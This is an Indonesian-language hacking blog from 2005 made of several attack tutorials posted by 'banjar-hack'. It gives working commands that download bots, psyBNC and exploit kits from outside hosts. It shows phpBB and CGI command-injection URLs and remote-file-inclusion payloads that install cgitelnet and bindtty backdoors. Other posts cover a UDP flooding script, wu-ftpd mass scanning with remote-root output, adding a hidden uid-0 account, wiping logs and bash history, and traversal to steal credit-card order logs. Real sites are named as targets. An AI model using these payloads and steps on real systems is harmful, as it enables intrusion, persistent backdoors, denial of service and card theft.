Sunday, August 28, 2005 |
All ouy |
Cara Buat Psy Dari shell
cd /var/tmp mkdir ... cd ... pwd wget www.acspakistan.com/sh/aris.tar.gz tar -zxvf aris.tar.gz cd ChuCu ./config ./fuck ./run ########################
Cara Buat Bot
wget http://www.discountcarshop.co.uk/data/sh/basica.tar.gz curl -f -O http://www.discountcarshop.co.uk/data/sh/basica.tar.gz tar -zxvf basica.tar.tz cd scripts rm -fr ary.tcl curl -f -O http://www.discountcarshop.co.uk/data/sh/netgate.tcl mv netgate.tcl ary.tcl cd .. ./serly fileconf nick ident IP channel owner ./serly a.txt asen-keren ident 209.59.132.199 green^hause AseN ./run a.txt /usr/local/apache/bin/httpd ########################
Cara Bindtykan phpBB2 Ke Putty cd /tmp;wget geocities.com/c0_pampers/as.tar.gz cd /tmp;curl -f -O geocities.com/c0_pampers/as.tar.gz cd /tmp;tar -zxvf as.tar.gz cd /tmp/.asen;./fuck;./run cd /tmp/awyeah;./fuck cd /tmp/awyeah;./run
Nb: netstat -a <- Buat Liat Port ##########################
Cara Buat Cgi dari Shell 01. Login Shell 02. wget www.geocities.com/wisen_asen/a.pl 03. ftp 04. login 05. Pasword 06. User 07. cd www 08. 250 CWD command successful 09. ls -alF 10. mput a.pl 11. chmod 755 a.pl
##########################
Buat Tembak Ip Org Dari Shell wget geocities.com/kupu2hitamputih/udppl.txt mv udppl.txt AseN.pl chmod 755 AseN.pl perl AseN.pl 60000 60000
http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe <-------- psy |
posted by banjar-hack @ 7:24 AM |
|
|
Saturday, August 27, 2005 |
Hacking PNPhpbb |
Hacking PNphpBB2
1. Gunakan paman google, cari situs yang menggunakan PNphpBB2 keywordnya = allinurl:pnphpbb2 site:ru
2. Masuk ke halaman utama situs sasaran. -->> http://sasaran.ru
3. Tambahkan address-nya sehingga menjadi http://sasaran.ru/modules/PNphpBB2/includes/function_admin.php?phpbb_root_path=http://nobodycare.com/php.jpg?
4. Jika yang muncul adalah php injection, selamat anda telah berhasil masuk ke dalam system korban. :-) |
posted by banjar-hack @ 10:28 AM |
|
|
|
Hacking PHPBB 2.0.10 |
hacking phpbb 2.0.10
1. Cari sasaran menggunakan paman google. keywordnya = phpbb 2.0 Jangan menggunakan keyword viewtopic karena gak akan diijinkan.
2. Kunjungi alamat forum yang didapat. Lihat dan kunjungi hingga pada bagian address tertulis http://sasaran.com/viewtopic.php?t=4(angka 4 bisa saja lain)
3. Kemudian pada bagian address coba tambahkan &highlight=%2527 http://sasaran.com/viewtopic.php?t=4&highlight=%2527
4. Jika yang muncul adalah error, maka bererti forumnya vuln (bolong). Jika tidak, cari sasaran lain. :-)
5. Setelah Muncul error coba tambahkan lagi menjadi
http://sasaran.com/viewtopic.php?t=t=4&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=ls -al
6. Jika yang muncul adalah daftar nama file dan direktori, selamat anda telah berhasil masuk ke dalam sysytem sasaran
7. Jika ada error tetapi eksekusi perintah cmd= tidak berjalan kemungkinan fungsi passthru sudah dimatikan oleh admin. Cari sasaran lain.
Contoh forum yang vuln : http://batam.linux.or.id/forumlinux/viewtopic.php?t=19
|
posted by banjar-hack @ 10:19 AM |
|
|
Thursday, August 25, 2005 |
CGI - Perl Exploit |
EXPLOITASI COMMAND EXECUTION DI PERL / CGI by BLAHPLOK aka CHOI
Khusus buat #e-c-ho, #indonesiahack, #jambihackerlink
Disini nggak akan dijelaskan mengapa command execution ini bisa terjadi, Kalo ingin mengcari tahu, silahkan mencari di google dan baca … So, Kita langsung ajah….
SATU : Mencari Target… 1. Buka Opera, internet explorer, mozilla dll 2. Masukkan alamat www.google.com di address bar 3. Masukkan keyword pencarian. Catatan : Trick menggunakan keyword dalam mencari bug cgi / perl : a. Gunakan words / kata2 yang mengarah secara langsung pada hal yang akan kita cari b. Gunakan key “allinurl:” c. Gunakan tanda petik ganda (“) jika diperlukan contoh 1: allinurl: “news.cgi?news=” txt Ini akan mencari semua url yang mengandung url news.cgi?news=, dan file yang akan Di buka yakni file dengan ektensi txt. Contoh 2 : allinurl: cgi action dat ini akan mencari semua url yang ada kata cgi, action dan dat, jadi biasanya url yang didapat adalah url yang mangandung file dengan akhiran .cgi ato .pl diikuti dengan parameter action dan membuka file dengan ektensi dat. (dengan key inilah bug WPS_SHOPPING ditemukan). 4. Oke sekarang kita telah memasukkan keyword yang kita inginkan. Dalam contoh ini kita akan mengunakan keyword = allinurl: cgi action file dat -> lalu klick cari/search dan hasilnya ………………………………………..:
DUA: Exploitasi:
1. Sekarang kita masuk ke exploitasi : Dalam exploitasi cgi/perl sangat mudah sekali. Yakni kita hanya memerlukan dua Karackter penting yaitu ‘|’ dan ‘;’ yang di letakkan pada tempat nama file yang akan dibuka. Sebagai contoh: Sekarang kita lihat url pada halaman pertama, yakni : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat&page=0 Klick kanan url tersebut dan klick open in new window. Setelah terbuka alamat url tersebut, Sekarang kita tambahkan character penting tersebut diatas, yakni pipe ‘|’. Pada akhir nama file yang akan dibuka yakni : file=.file0011.dat|ls| http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|ls|&page=0 (ls dalam command di linux shell adalah sama dengan dir pada windows, yakni melihat seluruh file directory aktif) yupe, sekarang kita bisa melihat pada tampilan halaman, ada perubahan tampilan, yakni disitu terlihat yang semula berisi huruf2 jepang, sekarang ada tulisan file. Itu artinya webserver tersebut vulnerable untuk di hack…!!!! Catatan: Tidak semua file cgi yang vulnerable ketika kita tambahkan char ‘|ls|’ Akan menampilkan file2-nya di browser. Ada yang tidak terlihat dan ada yang terlihat. Yupe, sekarang coba kita lihat id kita: http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|id|&page=0 hasilnya : uid = bla bla bla Asal uid bukan nobody, maka kita nggak akan kesulitan untuk langkah selanjutnya.
2. Memasukkan backdoor. (web backdoor) Kita bisa memasukkan beberapa jenis backdoor seperti bindtty dll............ Kenapa saya memilih web backdoor..??? karena web backdoor ini merupakan Backdoor yang sangat ampuh (menurut saya). Sulit di deteksi (apalagi kalo pake penyamaran nama file yang bener2 ok) Tidak terpengaruh oleh firewall dan admin web pada saat mengecek koneksi yang terjadi pada web-nya, yang mereka tau adalah kita hanya seperti browsing biasa. Karena kita melakukannya lewat port 80….!!! Saya menggunakan backdoor dari "http://www.rohitab.com/cgiscripts/cgitelnet.txt" Baik sekarang kita akan melakukan uploading backdoor tersebut ke web target. Dalam mengupload backdoor, kita akan menggunakan command wget. Yakni command di linux yang khusus untuk download ke web server. Catatan : Tidak semua server menginstall wget, dan jika itu terjadi, maka pilihan kita selanjutnya Adalah menggunakan lwp-download, fasilitas download dari perl.
Contoh : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|wget http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0 Kita mengambil cgitelnet.txt dari http://www.rohitab.com/cgiscripts/cgitelnet.txt, Yang selanjutnya akan di save di http://www.mikazo.net/cgiscript/sample/zdiary/ Sekarang kita check apakah kita berhasil ato tidak. http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt jika ada pesan error file not found, berarti kita gagal menggunakan wget, selanjutnya kita coba alternatif kedua : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|lwp-download http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0 sekarang kita chek lagi : http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt Yupe sekarang ada tampilan source dari cgitelnet.txt. Selamat berhasil….!!!! :P~ Baik sekarang apa selanjutnya..??? Selanjutnya adalah kita harus merubah nama cgitelnet.txt ke cgitelnet.cgi dan merubah Chmod-nya ke 755 agar kita bisa mengexekusi-nya. a. Merubah nama cgitelnet.txt ke cgitelnet.cgi http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|mv cgitelnet.txt cgitelnet.cgi|&page=0 b. Merubah chmod ke 755 http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|chmod 755 cgitelnet.cgi|&page=0
TIGA : Execkusi backdoor dan selancar di system target
Oke, sekarang kita telah berhasil memasukkan backdoor ke web target. Sekarang coba kita exekusi: http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.cgi tampilan yang muncul adalah : login: admin password: enter
baik sekarang kita masukkan password. Password = changeme daaaannn…. Hasilnya adalah :
[admin@www.mikazo.net /home/s20144-1/public_html/cgiscript/sample/zdiary]$
selesai….!!!!!
Oke, sekarang info: Pada contoh di atas, saya menggunakan bug pada zdiary.cgi. zdiary v1.51, v1.52 (all version) by mikazo untuk mencari webserver yang menginstall zdiary, gunakan key word pada google sebagai berikut : allinurl: “zdiary.cgi” |
posted by banjar-hack @ 7:33 AM |
|
|
Friday, August 19, 2005 |
Hacking Server dengan Shell |
Hacking Server Dari shell
Berikut ini saya paparkan bagaimana cara menghack suatu server dari shell. lets...Try For Hack...
Langkah pertama, kita masuk dulu ke shell kita, setelah kita berada di shell kita, kita download doloe exploits itu.www.utay-doyan.cc/ftp.tgz - www.utay-doyan.cc/xpost.tgz. Jadi di shell kita tinggal ketik wget www.utay-doyan.cc/ftp.tgz . Setelah file udah selesai di download ketik tar -zxvf ftp.tgz . Begitu juga dengan exploits xpost.tgz, cara compile nya sama dengan compile ftp.tgz seperti di atas. perlu di ingat paling tidak kita membuka dua session telnet or ssh . satu untuk exploits ftp satu session untuk xpost. Nahh, abis itu kita tinggal masuk ke directory ftp ketik cd ftp otomatis kita udah ada di directory ftp, and di session satunya buat xpost kita ketik cd xpost . Setelah kita udah berada di directory xpost contoh ketik ./scan 202.1 tekan enter. Maksud dari ./scan 202.1 adalah kita men scan ip 202.1 sampai selesai, abis kita enter tinggal tunggu aja nanti akan ada keterangan seperti ini :
[iwek@jarada xwurm]$ ./scan 211.240 Wait for Scanning 211.240 (3-5 minutes for class B) Scan Result: -------------------------------- 211.240.28.66 211.240.38.1 211.240.48.62 211.240.48.190 211.240.56.62 211.240.56.254 211.240.56.126 211.240.61.30 211.240.61.62 211.240.61.126 211.240.61.158 211.240.61.238 -------------------------------- Results logged in wu-scan.log [iwek@jarada xwurm]$
nahh itu hasil dari scan nyah tadi. tinggal kita ketik ./masswu wu-scan.log tunggu aja doloe, nttar kalo ada keterangan You Have Root In 211.240.56.254 berarti kemungkinan besar kita dapet jebol itu server.
Abis itu di session telnet yang satu nya, yang udah siap di directory ftp, kita ketik ./awu 211.240.56.254 apabila ada keterangan seperti di bawah ini :
[iwek@jarada ftp]$ ./awu 211.240.56.254 Checking 211.218.149.47 for vulnerable wu-ftpd 2.x < 2.6.2: Ok 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). Compiled for MnM 01/12/2001..pr0t!
# trying to log into 211.240.56.254 with (ftp/mozilla@) ... connected. # banner: 220 root.ivines.co.kr FTP server (Version wu-2.6.1-16) ready. # successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps # 2. sending bigbuf + fakechunk building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes # 3. triggering free(globlist[1]) # # exploitation succeeded. sending real shellcode # sending setreuid/chroot/execve shellcode # spawning shell ############################################################################ uid=0(root) gid=0(root) groups=50(ftp) Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow
Yess.. Berarti kita udah masuk server itu. coba ketik whoami apabila keterangnnya di bawah root berarti kita udah dapet acces root.
Mo adduser ? nahh nttar ketik /usr/sbin/adduser ganjen -g wheel -s /bin/bash -d /home/ganjen tekan enter, abis itu buat password nyah ketik
passwd ganjen tekan enter , abis itu ketik kanjud tekan enter abis itu ketik lagi kanjud , nb: ketik kanjud dua kali itu kegunaan nya buat password kita
nahh apabila ada keterangan :
Changing password for user ganjen passwd: all authentication tokens updated successfully
berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..
kalo mau dapet acces root ketik :
/usr/sbin/useradd crit -u 0 -d /
abis itu ketik lagi
passwd -d crit
abis ketik itu kita otomatis udah dapet acces root
nahh semuanya udah selesai khan... jangan ampe lupa apus jejak supaya ga cepet matek shell nyahh... abis semuanya kelar kita udah add user udah dapet acces root nttar ketik :
cd / rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog
udah di ketik semua ? udahh... tekan ctrl d . udah deh ... keluar khan... crottt... hiahaihaia mudah khan :) nice to try. Buat exploits lain kamu bisa cari di site-site laen... |
posted by banjar-hack @ 5:55 AM |
|
|
|
Cari CC di *.Log |
Beriku Adalah tutorial lama untuk Cari CC (BUkan Cawat Cewe) :P Lets Begin
gini buka google keywordnya "cgi-bin/store/index.cgi?page=" salah satu alamat site nya yg ada di google : http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm Repair_Manuals.htm <= ini dibuang trus trus masukin bug ini => ../admin/files/order.log trus http://www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log ok
Ok gimana...tuh drama singkat antara aku dengan Maling_duit...dan kayaknya si Maling_duit ituh yg lagi baca nih :)...emang enaaaaaaaaakkk.....Gua ngga Tanggung Jawab Kalo Trantib datang kerumah elo buat minta jatah hasil cardingan elo yaa...:P
Keep To Share. |
posted by banjar-hack @ 5:38 AM |
|
|
|
Instal CGI Telnet |
Install Cgi-telnet 1.buat url seperti ini :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "
3. akses cgitelnet kita dengan membuka url : " http://www.target.com/cgi-bin/test.pl "
masukkan passwordnya "n0fr13" |
posted by banjar-hack @ 4:38 AM |
|
|
|
PHP SUPER BUGS |
Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS" Author : K-159 Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew, Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel Email : eufrato@linuxmail.org Reference : security-corporations.com, security-focus.com, bugs-traq, google.com ------------------------------------------------------------------------------------ Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)
1. allinurl filename bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*". keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts " kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
2. allinurl content bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=". keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: " http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts " kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
3. allinurl page bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*". '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
4. allinurl link bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*". keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
5.allinurl file bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*". '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.
Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan : I. install bindtty telnet 1.buat url seperti ini: " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd " url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd. 2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi: " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd " 3.eksekusi file httpd tadi : " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd " 4. buka telnet ke IP target sesuai dg port bindttynya |
posted by banjar-hack @ 3:49 AM |
|
|
|
|
The Time |
|
Previous Post |
|
Archives |
|
it's You? |
|
Links |
SecurityDownload |
Powered by |
|
|